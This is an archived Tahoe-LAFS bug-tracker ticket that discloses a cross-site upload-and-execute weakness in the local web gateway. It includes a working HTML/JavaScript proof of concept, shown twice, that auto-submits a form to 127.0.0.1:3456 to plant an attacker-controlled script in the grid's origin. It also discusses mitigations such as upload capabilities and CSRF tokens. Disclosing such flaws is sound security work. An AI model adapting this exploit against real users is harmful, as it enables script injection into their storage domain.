[tahoe-lafs-trac-stream] [tahoe-lafs] #1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.
tahoe-lafs
trac at tahoe-lafs.org
Thu Jul 4 18:13:33 UTC 2013
#1859: Proof-of-concept attack: Upload and execute attacker controlled js from any
domain.
-------------------------+-------------------------------------------------
Reporter: | Owner: davidsarah
nejucomo | Status: new
Type: defect | Milestone: undecided
Priority: major | Version: 1.9.2
Component: code- | Keywords: security javascript same-origin
frontend-web | capleak
Resolution: |
Launchpad Bug: |
-------------------------+-------------------------------------------------
Old description:
> **Proof of Concept Attack**
>
> The following proof of concept shows how an html file loaded from any
> domain into (some) browsers with javascript enabled can inject an
> attacker controlled script into a grid, and //then// cause the user to
> execute that script in the domain of the grid:
>
> {{{
> <html>
> <head>
> <script>
>
> var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY
> ATTACKER CODE IN MAI DOMAIN " + document.domain +
> "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';
>
> window.onload = function () {
> var payload_input = document.getElementById('payload_input');
> payload_input.value = PAYLOAD
>
> var the_form = document.getElementById('the_form');
> the_form.submit();
> }
>
> </script>
> </head>
>
> <body id="body">
>
> <p>
> demo attack:
> </p>
>
> <p>
> This page attempts to inject an attacker controlled script into a <a
> href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
> this file is loaded from.
> </p>
>
> <form id="the_form"
> method="POST"
> action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
> enctype="multipart/form-data"
> >
> <input id="payload_input" type="text" name="file"></input>
> </form>
>
> </body>
> </html>
> }}}
>
> **Mitigations**:
>
> There are several moving parts at work here. The {{{when_done}}}
> parameter with uri substitution was very convenient.
>
> I think an upload capability would be the most consistent and thorough
> solution. Removing bits and pieces which may otherwise be useful, like
> {{{when_done}}}, feels like a piecemeal defense.
>
> Requiring CSRF tokens may be more comprehensive, but also doesn't sit
> well with the rest of the capability model. (A CSRF token would be a bit
> like a "make a this kind of http request" temporary capability.)
>
> **Related Tickets**:
>
> * #615 is about illicitly gaining victim capabilities; whereas this
> ticket is about bootstrapping an attack and/or abusing ambient authority.
> * #1215 is about adding CORS support and how that may create a
> vulnerability; this script demonstrates even without CORS support similar
> vulnerabilities already exist.
New description:
**Proof of Concept Attack**
The following proof of concept shows how an html file loaded from any
domain into (some) browsers with javascript enabled can inject an attacker
controlled script into a grid, and //then// cause the user to execute that
script in the domain of the grid:
{{{
<html>
<head>
<script>
var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY
ATTACKER CODE IN MAI DOMAIN " + document.domain +
"?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';
window.onload = function () {
var payload_input = document.getElementById('payload_input');
payload_input.value = PAYLOAD
var the_form = document.getElementById('the_form');
the_form.submit();
}
</script>
</head>
<body id="body">
<p>
demo attack:
</p>
<p>
This page attempts to inject an attacker controlled script into a <a
href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
this file is loaded from.
</p>
<form id="the_form"
method="POST"
action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
enctype="multipart/form-data"
>
<input id="payload_input" type="text" name="file"></input>
</form>
</body>
</html>
}}}
**Mitigations**:
There are several moving parts at work here. The {{{when_done}}}
parameter with uri substitution was very convenient.
I think an upload capability would be the most consistent and thorough
solution. Removing bits and pieces which may otherwise be useful, like
{{{when_done}}}, feels like a piecemeal defense.
Requiring CSRF tokens may be more comprehensive, but also doesn't sit well
with the rest of the capability model. (A CSRF token would be a bit like
a "make a this kind of http request" temporary capability.)
**Related Tickets**:
* #615 is about illicitly gaining victim capabilities; whereas this ticket
is about bootstrapping an attack and/or abusing ambient authority.
* #1215 is about adding CORS support and how that may create a
vulnerability; this script demonstrates even without CORS support similar
vulnerabilities already exist.
--
Comment (by nejucomo):
This is related to:
* #587 "Web nodes provide ambient upload authority"
* The accounting proposal - https://tahoe-lafs.org/trac/tahoe-
lafs/browser/docs/proposed/accounting-overview.txt
* Note: So long as the web interface requires an explicit, non-ambient
authority for space usage, this attack vector will be less useful.
--
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1859#comment:9>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage
More information about the tahoe-lafs-trac-stream
mailing list